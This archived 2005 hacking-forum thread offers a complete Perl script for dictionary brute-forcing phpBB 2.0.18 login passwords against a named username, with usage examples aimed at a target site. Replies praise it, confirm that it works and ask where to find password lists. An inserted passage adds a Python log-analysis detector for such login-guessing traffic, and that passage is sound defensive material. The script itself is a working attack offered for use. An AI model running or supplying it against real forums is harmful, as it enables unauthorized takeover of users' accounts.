ANTICHAT Forum (https://forum.antichat.xyz/index.php)
-   Forum for discussion of ANTICHAT (https://forum.antichat.xyz/forumdisplay.php?f=72)
-   -   phpBB <=2.0.18 "Login Dictionnary Attack" (https://forum.antichat.xyz/showthread.php?t=11983)

néM3S!s 21.12.2005 13:18

phpBB <=2.0.18 "Login Dictionnary Attack"
--> Brute force login.php with dictionnary

This exploit is Coded by my friend DarkFig.. enjOY antichat ;)

Usage: brutephpbb.pl <host> <path> <port> <pass_file> <username> <logfile>

C:\:brutephpbb.pl www.target.ru /phpBB2/ 80 dictionnary.txt admin result.txt


Code:

#!/usr/bin/perl
############################################
#--------------------------Hack Private Version property-------------------------
#Credits:                        Weakness and Xploit by DarkFig
#Affected products:    All PhpBB versions <= 2.0.18
#Type:                            Dictionnary attack
#Solutions:                    None official , but many solutions are possible ;)
#Note:                          Not yet revealed | If a line of the dictionnary file contain no data => "End of the password file"
#For:                            Hack Private Version     
#------------------------------------------------------------------------------------------------
############################################
use IO::Socket;

#--------------Usage--------------#
if(@ARGV != 6){
print "
+---------------------------------------------------------------------------------+
+--------------------PhpBB <= 2.0.18 Passwd Dictionnary Attack--------------------+
+-----------------------By DarkFig for Hack Private Version-----------------------+
+---------------------------------------------------------------------------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    +
+---------------------------------------------------------------------------------+
+ <host>        => The host where PhpBB is installed        |  [Ex: site.com]    +
+ <path>        => Path of the PhpBB board                  |  [Ex: /forum/]    +
+ <port>        => PhpBB board port                        |  [Default is 80]  +
+ <pass_file>  => File containing words (dictionnary file) |  [Ex: dico.txt]    +
+ <username>    => Username you want to bruteforce          |  [Ex: MasterLamer] +
+ <file_result> => File you want to log activity            |  [Ex: results.txt] +
+---------------------------------------------------------------------------------+
";exit();}

#--------------Data--------------#
$host      = $ARGV[0];
$path      = $ARGV[1];
$full      = "$host"."$path";
$port      = $ARGV[2];
$pass_file  = $ARGV[3];
$username  = $ARGV[4];
$fileresult = $ARGV[5];
$OK        = 0;
$referer    = "http://"."$host"."$path"."login.php?redirect=";
$postit    = "$path"."login.php";

#--------------Hello world-----------------#
print "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
      [+] Username            | $username
      [+] Dictionnary file    | $pass_file
      [+] Attack log          | $fileresult
+---------------------------------------------------------+";

#--------------Password file--------------#
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
$nligne = "0";
while ($OK ne 1) {
$passwordz  = "$passdico[$nligne]";
$request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
$length    = length $request;
if ($passwordz eq ""){print "\n[-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}

#--------------Sending data--------------#
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
read $send, $answer, 15;
close($send);

#-------------Success--------------------------------------------#
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
      [-] Trying the password "."$passwordz
      [+] User:    $username
      [+] Password: $passwordz
+---------------------------------------------------------+\n";
open results, ">$fileresult";
print results "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
    [+] PhpBB board              | $full
  [+] Board's port              | $port
  [+] Username                  | $username
  [+] Dictionnary file          | $pass_file
    [+] Number of test            | $nligne
    [+] Password found            | $passwordz
+---------------------------------------------------------+\n";
close(FILE);close(results);exit();}

#-------------Failed--------------------------------------------#
if ($OK == 0) {print "\n      [-] Trying the password "."$passwordz";$nligne++;}}

Made in France ! :D
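
For defenders, the traffic this script generates is easy to spot in a web server access log: a run of POST requests to login.php from one client, each answered with a non-302 status, possibly ending in a 302. The detector below is an added example, not part of the original post or of phpBB; the function name, the threshold and window values, and the sample log lines are assumptions made for illustration, and the log is assumed to be in common/combined format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common/combined log format: ip - - [time] "METHOD path PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def detect_login_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Return alerts for clients that POST to login.php and fail repeatedly.

    A POST answered with anything other than 302 counts as a failed login
    (302 is the success signal the script above checks for). A 302 that
    arrives while the client is over the threshold is flagged separately.
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    reported = set()              # ips already alerted for the current burst
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        if method != "POST" or not path.split("?")[0].endswith("/login.php"):
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        while q and when - q[0] > window:   # drop failures older than the window
            q.popleft()
        if status == "302":
            if len(q) >= threshold:
                alerts.append((ip, "login succeeded after failure burst", len(q)))
            q.clear()
            reported.discard(ip)
        else:
            q.append(when)
            if len(q) >= threshold and ip not in reported:
                reported.add(ip)
                alerts.append((ip, "repeated failed logins", len(q)))
    return alerts

# Constructed sample log (documentation addresses), not taken from a real server.
SAMPLE = [
    f'203.0.113.7 - - [21/Dec/2005:13:20:{s:02d} +0000] "POST /phpBB2/login.php HTTP/1.1" 200 5120'
    for s in range(6)
] + [
    '203.0.113.7 - - [21/Dec/2005:13:20:06 +0000] "POST /phpBB2/login.php HTTP/1.1" 302 0',
    '198.51.100.4 - - [21/Dec/2005:13:21:00 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 5120',
    '198.51.100.4 - - [21/Dec/2005:13:21:09 +0000] "POST /phpBB2/login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for alert in detect_login_guessing(SAMPLE):
        print(alert)
```

An alert of the second kind means the account's password should be treated as compromised and reset; the first kind is a signal to throttle or block the client and to lock out or delay further attempts on the targeted account.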

néM3S!s 21.12.2005 13:45

Video: here

GreenBear 21.12.2005 15:12

big tnx
nice ;)

x-ultra-x 21.12.2005 18:36

well done man, good job!

max_pain89 21.12.2005 22:50

good... ;) France is friend

néM3S!s 21.12.2005 23:35

ipb, punbb versions coming soon ;)

Powaaaaaaaa my friends !

NeMiNeM 22.12.2005 01:29

The speed is not very high, but IT WORKS=) 10x
+!

roruda_semu 23.12.2005 14:55

Good job Nemesis , thanks

Гаврила 28.12.2005 12:10

Excuse me,where can I get a Dictionnary?

Otaku 28.12.2005 17:27

www.yandex.ru
www.google.com
antichat=>search

